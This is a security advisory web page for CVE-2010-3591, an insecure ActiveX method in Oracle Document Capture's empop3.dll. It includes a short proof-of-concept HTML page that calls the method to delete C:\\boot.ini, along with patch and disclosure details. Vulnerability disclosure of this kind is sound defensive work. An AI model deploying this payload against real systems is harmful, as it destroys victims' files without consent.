Security News -  Security Reviews -   Exploits -  Tools -  UNIX Focus -  Windows Focus
SecuriTeam™  Beyond Security®  SecuriTeam™ Home  Ask the Team  Mailing Lists  Advertising Info  Blogs SecuriTeam™ in Your Inbox   E-mail this CVE-2010-3591 to a friend New vulnerability? New tool? Tell us	CVE-2010-3591 Oracle Document Capture empop3.dll Insecure Method Vulnerability     Credit: The information has been provided by Evdokimov Dmitriy . The original article can be found at: http://seclists.org/bugtraq/2011/Jan/152 Website Security Scan Code Vulnerability Test Network Assessment Tool Detect hidden vulnerabilities Exhaustive automated testing Real-time, continuous security Get guidance from professionals of internal or 3rd party code. scanning for your entire network    CVE-2010-3591 Details Check for CVE-2010-3591 Vulnerability Assessment and Management. Automated Pen Testing for 50 to 50,000 nodes beyondsecurity.com/vulnerability-scanner Vulnerable Systems:  * Oracle Document Capture Release 10gR3 Oracle Document Capture contains ActiveX component EMPOP3Lib (empop3.dll) Lib GUID: {F647CBE5-3C01-402A-B3F0-502A77054A24} ..which contains an insecure method "DownloadSingleMessageToFile" that can be used to delete any file in the filesystem. Class EasyMailPop3 GUID: {F647CBE5-3C01-402A-B3F0-502A77054A24} Number of Interfaces: 1 Default Interface: IPOP3Main RegKey Safe for Script: False RegkeySafe for Init: False KillBitSet: False An Attacker can construct an html page that calls the vulnerable function "DownloadSingleMessageToFile" from ActiveX component empop3.dll Example: <HTML>          <HEAD>          <TITLE>DSecRG</TITLE>          </HEAD>          <BODY>                    <OBJECT id='eds' classid='clsid:F647CBE5-3C01-402A-B3F0-502A77054A24'></OBJECT>            <SCRIPT>                            function Exploit(){                  eds.DownloadSingleMessageToFile(1,"C:\\boot.ini",1);          }          Exploit();            </SCRIPT> </BODY> </HTML> Patch Availability: All customers can download CPU patches following instructions from: http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html CVE Information: CVE-2010-3591 Disclosure Timeline: Reported 22.03.2010 Vendor response 31.03.2010 Date of Public Advisory 24.01.2011  Comments on CVE-2010-3591:  Add new comment:  Subject:  Name/Nick/Email:          Chars Left:	All Sections Security News Unix focus Exploits Tools Windows focus Security Reviews
	Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus

Copyright © 1998-2010 Beyond Security® All rights reserved.
Terms of Use Site Privacy Statement.
SecuriTeam™ is a trademark of Beyond Security®